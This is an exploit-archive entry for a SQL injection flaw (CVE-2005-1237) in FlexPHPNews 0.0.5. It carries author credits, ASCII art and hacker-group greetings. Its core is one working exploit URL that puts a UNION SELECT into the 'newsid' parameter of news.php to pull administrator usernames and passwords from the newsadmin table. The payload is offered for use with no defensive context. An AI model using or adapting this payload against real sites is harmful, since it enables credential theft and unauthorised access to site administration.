FlexPHPNews 0.0.5 - 'newsid' SQL Injection
Author: Dj7xpl
type: webapps
platform: php
port:
date_added: 2007-03-31
date_updated: 2016-12-05
verified: 1
codes: OSVDB-15715;CVE-2005-1237
tags:
aliases:
screenshot_url:
application_url:
.-""""""""-.
/ Dj7xpl \
| |
|, .-. .-. ,|
| )(_o/ \o_)( |
|/ /\ \|
(@_ (_ ^^ _)
_ ) \_______\__|IIIIII|__/_______________________________
(_)@8@8{}<________|-\IIIIII/-|________________________________>
)_/ \ /
(@
+_______________________________________________Iranian Are The Best In World___________________________________________+
*
*
* [~] Portal.......: Flexphpnews version 0.0.5
* [~] Download.....: http://www.china-on-site.com/flexphpsite/other.php
* [~] Author.......: Dj7xpl | Dj7xpl@yahoo.com
* [~] Class........: Remote SQL Injection Vulnerability
*
+_______________________________________________________________________________________________________________________+
+_______________________________________________________________________________________________________________________+
*
*
* [~] Exploit......: http://[Taget]/[Path]/news.php?newsid=999+union+select+0,username,password+from+newsadmin
*
+_______________________________________________________________________________________________________________________+
+_______________________________________________________________________________________________________________________+
*
*
* [~] Sp Tnx.......: Milw0rm, Ashiyane, Delta Hacking, Virangar, Hackerz.ir, Shabgard.org, Simorgh .........
*
+_______________________________________________________________________________________________________________________+
# milw0rm.com [2007-04-01]